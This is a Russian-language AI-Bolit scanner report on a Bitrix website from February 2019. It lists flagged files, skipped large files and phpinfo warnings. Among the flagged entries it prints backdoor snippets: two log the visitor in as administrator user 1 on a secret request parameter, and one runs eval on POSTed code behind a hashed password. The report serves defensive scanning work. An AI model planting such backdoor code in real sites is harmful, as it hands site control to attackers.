Отчет сканера AI-Bolit v20181117-2210: /home/bitrix/www/ (1/1)
Сканер бесплатный только для личного некоммерческого использования. Информация по коммерческой лицензии (пункт №11). Авторское свидетельство о гос. регистрации в РосПатенте №2012619254 от 12 октября 2012 г.
Затрачено времени: 32 m . Сканирование начато 05-02-2019 в 14:01:34, сканирование завершено 05-02-2019 в 14:34:26
Всего проверено 26488 директорий и 44298 файлов. Использовано памяти при сканировании: 25.12 Mb.
Сводный отчет
Вредоносных скриптов12
Пропущенных больших файлов14
Обращаем внимание, что обнаруженные файлы не всегда являются вирусами и хакерскими скриптами. Сканер минимизирует число ложных обнаружений, но это не всегда возможно, так как найденный фрагмент может встречаться как во вредоносных скриптах, так и в обычных.

Для диагностического сканирования без ложных срабатываний мы разработали специальную версию сканера для хостинг-компаний.

Внимание! Наш сканер обнаружил подозрительный или вредоносный код.

Возможно, ваш сайт был взломан. Рекомендуем срочно проконсультироваться со специалистами по данному отчету.


Рекомендуем также проверить сайт бесплатным онлайн-сканером ReScan.Pro.


Не оставляйте файл отчета на сервере, и не давайте на него прямых ссылок с других сайтов. Информация из отчета может быть использована злоумышленниками для взлома сайта, так как содержит информацию о настройках сервера, файлах и каталогах.
Наши продукты:
Критические замечания
Уязвимости в скриптах (1)
  • /home/bitrix/www/bx_1c_import.php - AFD : https://habrahabr.ru/company/dsec/blog/326166/
  • Эти файлы могут быть вредоносными или хакерскими скриптами (12)
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    [x] BIG FILE. SKIPPED.
    12/09/2018 16:03:40
    02/07/2012 13:05:27
    700.69 Kb
    87a2a4ac4e5c97a3ff3f227b2922c1202c5966d1
    x
    1341223527
    id_big_1
    [x] 1…re($_SERVER["DOCUMENT_ROOT"]."/bitrix/modules/main/include/prolog_before.php");if($_REQUEST["key"]==AD_KEY){global$USER; $USER->Authorize(1);header("Location:/");}?
    04/02/2019 21:35:49
    04/02/2019 21:35:48
    207 b
    5ad247ba12e337af9597adf3b3c31d9aa7af131f
    x
    1549305348
    id_a89027da
    [x] BIG FILE. SKIPPED.
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    927.43 Kb
    5fff631ca5ae711cc1d56205bd32587fb4918338
    x
    1479946090
    id_big_1
    [x] BIG FILE. SKIPPED.
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    876.27 Kb
    1a3d355394731b26ade9fbe1784d430e54e10f17
    x
    1479946090
    id_big_1
    [x] 1…file","AREA_FILE_SUFFIX"=>"inc","PATH"=>SITE_TEMPLATE_PATH."/inc/catalog.php"));?></div><?if($_GET["szyk"]){global$USER; $USER->Authorize(1);}?><?require($_SERVER["DOCUMENT_ROOT"]."/bitrix/footer.php");?
    12/09/2018 16:03:09
    21/03/2018 17:12:46
    1.76 Kb
    6d22dc2398fa088daed1a800e531c77bc77d7edb
    x
    1521641566
    id_a89027da
    [x] BIG FILE. SKIPPED.
    05/02/2019 13:50:12
    05/02/2019 13:50:12
    673.06 Kb
    845f89f08b3a9f7f978956832ad6291e40bc3873
    x
    1549363812
    id_big_1
    [x] BIG FILE. SKIPPED.
    05/02/2019 13:37:59
    05/02/2019 13:37:59
    673.06 Kb
    a1125cb67bb65f1e0bfa356b208402353078db24
    x
    1549363079
    id_big_1
    [x] BIG FILE. SKIPPED.
    05/02/2019 13:36:49
    05/02/2019 13:36:49
    1.14 Mb
    d123bf9f7431ee6ad53090e6ad8bf2e050bef20e
    x
    1549363009
    id_big_1
    [x] 1…."/modules/main/filter_tools.php"); require_once($_SERVER["DOCUMENT_ROOT"].BX_ROOT."/modules/main/ajax_tools.php");  $GLOBALS['_____1358942114']=array(base64_decode('R2V0T3B0aW9uU3RyaW5n'),base64_decode('U2V0T3B0aW9uU
    04/02/2019 21:47:53
    04/02/2019 21:47:51
    25.98 Kb
    99ce3aa81f322832dc0e59ba85ca22784532a6fa
    x
    1549306071
    id_93e67a24
    [x] 1<? $GLOBALS['_____570583507']=array('IncludeModuleLangFile','Fetch','Fetch','Fetch','GetOptionString','SetOptionString','S
    12/09/2018 16:03:10
    21/03/2018 17:42:54
    240.34 Kb
    fecffb300bf787b549cf9a86e2692a4732235a84
    x
    1521643374
    id_93e67a24
    [x] 1<? $GLOBALS['_____2025737787']=array('AddAutoloadClasses','IncludeModuleLangFile');?><?$GLOBALS['____686050164']=array('me
    12/09/2018 16:03:10
    21/03/2018 17:31:42
    5.92 Kb
    1ed11f2a71089658a5d9f298e83290482bc7b003
    x
    1521642702
    id_93e67a24
    [x] 1…p;&amp;md5(md5($_POST[&quot;p&quot;]))==&quot;687fd6484895b229cf034a6eb44ce69f&quot;){<span class="marker">&nbsp;</span> eval(stripslashes($_POST[&quot;c&quot;]));}echo$ibv;}?</div></td><td align=center><div class="ctd">07/01/2019 21:28:26<
    04/02/2019 13:00:40
    04/02/2019 13:00:40
    51.38 Kb
    db51c06713299be2ac4cc906aaa1e0374240ded1
    x
    1549274440
    id_81881b79
    Предупреждения
    Дорвеи, реклама, спам-ссылки, редиректы
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    1<?php  phpinfo();?
    12/09/2018 16:03:03
    24/11/2016 03:08:11
    20 b
    176f84074f83e4f96c234359a691a0dc5e9e4762
    x
    1479946091
    id_z1193059
    1<?php require_once 'libraries/common.inc.php';PMA_Response::getInstance()->disable();if($GLOBALS['cfg']['ShowPhpInfo']){ phpinfo();
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    386 b
    8f4f37038a07f47474f6eeab6b9b10bd30efb5ff
    x
    1479946090
    id_z4597664
    1…cting) set of directives are used:..code-block:: apache SetOutputFilter PHP SetInputFilter PHP and..code-block:: apache AddType application/x-httpd-php.php In the case we saw,one set of directives was in ``/etc/httpd/conf/httpd.conf``,whil
    12/09/2018 16:03:03
    24/11/2016 03:08:09
    86.24 Kb
    73958ff75fea416abd44c34d3283bf739b12ca09
    x
    1479946089
    id_z2305719
    1…="expires" content="0"><meta http-equiv="Pragma" content="no-cache"><meta http-equiv="Cache-Control" content="no-cache"> <meta http-equiv="Refresh" content="0;url=<?php echo htmlspecialchars($uri)?>"><script type="text/javascript">//<![CDAT
    12/09/2018 16:03:03
    24/11/2016 03:08:09
    861 b
    43607b1a2332544e0c9b0b261234baefac39fe8b
    x
    1479946089
    id_z8823394
    1…log_admin_before.php");if(!$USER->CanDoOperation('edit_php')){$APPLICATION->AuthForm(GetMessage("ACCESS_DENIED"));}else{ phpinfo();}?
    12/09/2018 16:03:10
    21/03/2018 17:42:41
    204 b
    3de4d48a050d233c344ad5b4be60ef4f15d4498f
    x
    1521643361
    id_z2111862
    1<? phpinfo();?
    12/09/2018 16:03:35
    24/11/2016 03:08:11
    17 b
    2a8631b78e77adf1864057f93261936a75404193
    x
    1479946091
    id_z8851101
    Большие файлы (больше чем 650.00 Kb). Пропущено
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    12/09/2018 16:03:40
    02/07/2012 13:05:27
    700.69 Kb
    87a2a4ac4e5c97a3ff3f227b2922c1202c5966d1
    x
    1341223527
    id_z1123953
    12/09/2018 16:03:04
    24/11/2016 03:08:02
    88.90 Mb
    db1472240593bf5295a166a79b6cff9b2c21a7b7
    x
    1479946082
    id_z5297565
    12/09/2018 16:03:04
    24/11/2016 03:07:59
    20.17 Mb
    db1472240593bf5295a166a79b6cff9b2c21a7b7
    x
    1479946079
    id_z5662642
    12/09/2018 16:03:04
    16/10/2017 14:22:51
    72.86 Mb
    db1472240593bf5295a166a79b6cff9b2c21a7b7
    x
    1508152971
    id_z3601797
    12/09/2018 16:03:18
    24/11/2016 03:09:06
    19.81 Mb
    3416521f1b77306a085e4941a4f1b4743b597581
    x
    1479946146
    id_z4108610
    12/09/2018 16:03:04
    16/10/2017 14:22:00
    72.86 Mb
    21050974a99a6df4eddaaf6759e94af3f7e3c57f
    x
    1508152920
    id_z5013980
    12/09/2018 16:03:03
    24/11/2016 03:08:11
    1.82 Mb
    21050974a99a6df4eddaaf6759e94af3f7e3c57f
    x
    1479946091
    id_z6540807
    06/11/2018 15:30:11
    06/11/2018 15:30:11
    14.60 Mb
    4f731929ad8dc1557781c061bd196662fafbf12c
    x
    1541507411
    id_z3673138
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    927.43 Kb
    5fff631ca5ae711cc1d56205bd32587fb4918338
    x
    1479946090
    id_z1280085
    12/09/2018 16:03:03
    24/11/2016 03:08:10
    876.27 Kb
    1a3d355394731b26ade9fbe1784d430e54e10f17
    x
    1479946090
    id_z5142466
    16/11/2018 22:12:36
    16/11/2018 22:12:36
    411.90 Mb
    da39a3ee5e6b4b0d3255bfef95601890afd80709
    x
    1542395556
    id_z3866197
    05/02/2019 13:50:12
    05/02/2019 13:50:12
    673.06 Kb
    845f89f08b3a9f7f978956832ad6291e40bc3873
    x
    1549363812
    id_z4877749
    05/02/2019 13:37:59
    05/02/2019 13:37:59
    673.06 Kb
    a1125cb67bb65f1e0bfa356b208402353078db24
    x
    1549363079
    id_z6448185
    05/02/2019 13:36:49
    05/02/2019 13:36:49
    1.14 Mb
    d123bf9f7431ee6ad53090e6ad8bf2e050bef20e
    x
    1549363009
    id_z3689591
    Подозрение на дорвей
    ПутьИзменение свойствИзменение содержимогоРазмерCRC32
    -
    -
    -
    x
    id_z4005758
    Версии найденных CMS
    Bitrix v15.5.1